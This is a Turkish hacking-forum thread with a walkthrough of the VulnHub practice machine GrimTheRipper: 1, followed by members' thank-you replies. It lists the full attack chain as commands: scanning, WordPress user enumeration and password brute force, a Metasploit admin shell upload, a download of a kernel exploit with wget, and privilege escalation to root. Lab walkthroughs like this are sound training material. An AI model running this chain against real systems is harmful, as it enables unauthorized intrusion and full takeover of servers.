GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS - Turkhackteam.org/net

"P4RS

Green Team Lideri

Üyelik tarihi:

01/2017

Nereden:

Balkes

Yaş:

Mesajlar:

4.559

Konular:

481

Teşekkür (Etti):

1121

Teşekkür (Aldı):

2268

Ticaret:

(0) %

16-12-2019 22:48

GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

Merhabalar TürkHackTeam ailesi, bugün sizlere "GrimTheRipper: 1 Zafiyetli Makinesinin Çözümünü" göstereceğim.

https://www.vulnhub.com/entry/grimtheripper-1,350/

Makine İsmi: GrimTheRipper: 1

Yayınlanma Tarihi: 20 Ağustos 2019

Yapımcı: Manish Chandra

Seri: GrimTheRipper

Açıklama: Hedefte Root yetkisine erişmek

Dosya Boyutu: 1.5 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Orta

İlk öncelikle hedefin IP adresini almamız lazım bunun için de

Kod:

sudo netdiscover

yazalım.

Hedefin IP adresini öğrendik.

NMAP taraması yaparak açık portlar hakkında bilgi sahibi olacağız. Bunun için

Kod:

nmap -A IP_ADRESİ

olarak yazalım. 22 ve 80 portlarının açık olduğunu gördük

Tarayıcımızı açalım ve IP adresini arayalım. Sitede herhangi bir şey bulamadık.

Siteyi kazımak için dirb aracını kullanacağız. Terminale

Kod:

dirb http://IP_adresi

yazalım.

robots.txt dosyasını ve index dosyalarını buldu bir bakalım.

Bizleri index2 kısmına yönlendiriyor.

İndex2 de ise bir görsel bizleri karşıladı.

Kaynak kodlarına bakayım dedim ve bir base64 şifresi karşıma çıktı

Bunu

Kod:

echo THpFd0f1UQXhNREU9IHRyeSBoYXJk | base64 -d

yazdım ve bir şifre daha verdi. Daha sonra bunu tekrar

Kod:

echo 'LzEwMTAxMDE=' | base64 -d

yazdığımda bana /1010101 verisini verdi.

Sitede IP_ADRESİ/1010101 olarak yazdığımda bir /wordpress olduğunu gördüm.

Wordpress görüntüsü bu şekildedir

Wpscan ile kullanıcı verilerini listelemek için

Kod:

wpscan --url http://IP_adresi/1010101/wordpress/ -e u

yazalım.

Kullanıcının admin olduğunu gördük.

Brute saldırı için rockyou.txt dosyasını kullanacağım. Terminale

Kod:

wpscan wpscan --url http://IP_adresi/1010101/wordpress/ -U admin -P rockyou.txt dosyasının uzantısı

Şifrenin Password@123 olduğunu öğrendik.

Ardından wp-admin-shell-upload exploitini kullanmak için msfconsole'a giriyoruz.

Kod:

msfconsole

yazalım.

Terminale

Kod:

search webapp

yazalım.

Burada 105. sıradakini kullanacağız.

Kullanmak için

Kod:

use 105

yazalım ve ayarlarını görmek için

Kod:

show options

yazalım.

Ayarlamamız gereken bazı ayarlar var bunları da

Kod:

set RHOSTS IP_ADRES 
set TARGETURI /1010101/wordpress/
set USERNAME admin
set PASSWORD Password@123
exploti

yazarak giriş yapalım.

Kabuğa erişmek için ilk öncelikle

Kod:

shell

yazalım ardından da kabuğa erişim için

Kod:

python -c 'import pty;pty.spawn("/bin/bash")'

yazalım ve kabuğa erişelim. Ardından Linux bilgilerini almak için

Kod:

lsb_release -a

yazarak Linux bilgilerini aldık.

Ardından searchsploit ile kernel exploiti aramaya koyuldum. Terminale

Kod:

searchsploit Ubuntu 12.04

yazdım ve kırmızı işaretle aldığım kısmında ki dosyayı almak için

Kod:

searchsploit -m 37292.c

yazdım. Ardından ağı açarak hedef makineden dosyayı indirmek için

Kod:

python -m SimpelHTTPServer

yazdım.

Ardından exploit ile giriş yaptığımız terminale gelerek

Kod:

cd /tmp
wget IP_adresi:8000/37292.c

yazarak dosyayı makineye indirdik.

Ardından dosyayı shell dosyasına çevirmek için

Kod:

gcc 37292.c -o shell

yazdık ve dosyaya tam yetki vermek için

Kod:

chmod 777 shell

yazdık. Ardından shell dosyasını çalıştırmak için

Kod:

./shell

yazalım. Shell dosyası çalıştı peki hangi kullanıcıdayız?

id yazalım ve root yetkisinde olduğumuzu görelim.

Konum bu kadardı arkadaşlar, başka bir konuda görüşmek üzere sağlıcakla..

---------------------

Yardım Merkezi’nde Ödüllü Yarışma! TIKLA

Konu "P4RS tarafından (16-12-2019 23:04 Saat 23:04 ) değiştirilmiştir.

Alıntı Yap

Noah Parker, OlcayMarufHan, PourLa, VaTanSevDalısı, By Ghost, PigGunner, AhmetKaan46, Rumexus, MyKrallife, prototyqe, xbaytar, Xowly, Rozzz Teşekkür etti.

PourLa

Green Team

Üyelik tarihi:

03/2016

Nereden:

☪

Mesajlar:

1.326

Konular:

282

Teşekkür (Etti):

351

Teşekkür (Aldı):

333

Ticaret:

(0) %

16-12-2019 23:00

Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

Ellerin dert görmesin hocam ellerine sağlık

---------------------

☪ PourLa ☪

Html/Css > Python > C ve C++

( }-----{ TÜRK HACK TEAM }-----{ )
Twitter | Telegram | İnstagram

Yardım Merkezi’nde Ödüllü Yarışma! TIKLA

Alıntı Yap

By Ghost

Yardımsever

Üyelik tarihi:

07/2013

Nereden:

C:\Linux

Yaş:

Mesajlar:

939

Konular:

143

Teşekkür (Etti):

396

Teşekkür (Aldı):

405

Ticaret:

(0) %

16-12-2019 23:26

Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

Elinize sağlık hocam wp reverse shell kısmına kadar kolay gözükse de yetki yükseltme de kernel exploit olayı biraz zorlayıcı duruyor onunda kullanımı görmek güzel olmuş

---------------------

Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--

Alıntı Yap

Uchiha-Sasuke

Green Team (Deneyimli)

Üyelik tarihi:

07/2016

Nereden:

MSFVenom

Mesajlar:

1.344

Konular:

Teşekkür (Etti):

Teşekkür (Aldı):

371

Ticaret:

(0) %

16-12-2019 23:27

Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

Ellerine Sağlık P4RS

, Yine Mükemmel Olmuş.

---------------------

"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".

TELEGRAM

Yardım Merkezi’nde Ödüllü Yarışma! TIKLA

Alıntı Yap

PigGunner

Yardımsever

Üyelik tarihi:

07/2013

Nereden:

Turk

Mesajlar:

2.312

Konular:

Teşekkür (Etti):

201

Teşekkür (Aldı):

399

Ticaret:

(0) %

17-12-2019 00:56

Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

Elinize sağlık hocam.

Alıntı:

By Ghost´isimli üyeden Alıntı

Elinize sağlık hocam wp reverse shell kısmına kadar kolay gözükse de yetki yükseltme de kernel exploit olayı biraz zorlayıcı duruyor onunda kullanımı görmek güzel olmuş

Aynen "By Ghost"a katılıyorum. Bahsettiğimden biraz farklıymış. Ama detaylı ve güzel anlatmışsınız. Tekrardan elinize sağlık.

---------------------

Yardım Merkezi’nde Ödüllü Yarışma! TIKLA

Alıntı Yap

AhmetKaan46

Üye

Üyelik tarihi:

02/2019

Nereden:

root@Kaan:~#

Yaş:

Mesajlar:

1.386

Konular:

137

Teşekkür (Etti):

737

Teşekkür (Aldı):

423

Ticaret:

(0) %

17-12-2019 01:17

Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

Eline sağlık hocam devamını bekliyorum zafitet çözümlerinin

Alıntı Yap

Rumexus

Stajyer Moderatör

Üyelik tarihi:

01/2016

Mesajlar:

1.083

Konular:

Teşekkür (Etti):

651

Teşekkür (Aldı):

245

Ticaret:

(0) %

17-12-2019 01:22

Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

Elinize sağlık hocam mükemmel bir konu çok yararlı, kendini bu alanda geliştirecek arkadaşlar için.

---------------------

PALA

Liserjik

Alıntı Yap

stayhigh

Grafiker

Üyelik tarihi:

09/2019

Nereden:

Mars

Mesajlar:

522

Konular:

112

Teşekkür (Etti):

309

Teşekkür (Aldı):

489

Ticaret:

(0) %

17-12-2019 01:51

Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

Hocam ellerinize sağlık

---------------------

🇹🇼🇮🇹🇹🇪🇷 | 🇾🇴🇺🇹🇺🇧🇪 | 🇹🇪🇱🇪🇬🇷🇦🇲

Yardım Merkezi’nde Ödüllü Yarışma! TIKLA

Alıntı Yap

CrazyExelans

Üye

Üyelik tarihi:

08/2017

Nereden:

Burning Hâll

Yaş:

100

Mesajlar:

925

Konular:

Teşekkür (Etti):

Teşekkür (Aldı):

454

Ticaret:

(0) %

17-12-2019 13:08

Cevap: GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

Emeğine sağlık.

---------------------

Kod:

,
,    -------                                                  --------------
,      ◘The Ordinaryus, Father of White's, Prof. Doç. Dr. Sn. Abuzer Kömürcü Exelansları  R.I.P◘
,    -------                                                  --------------
,

Alıntı Yap

MyKrallife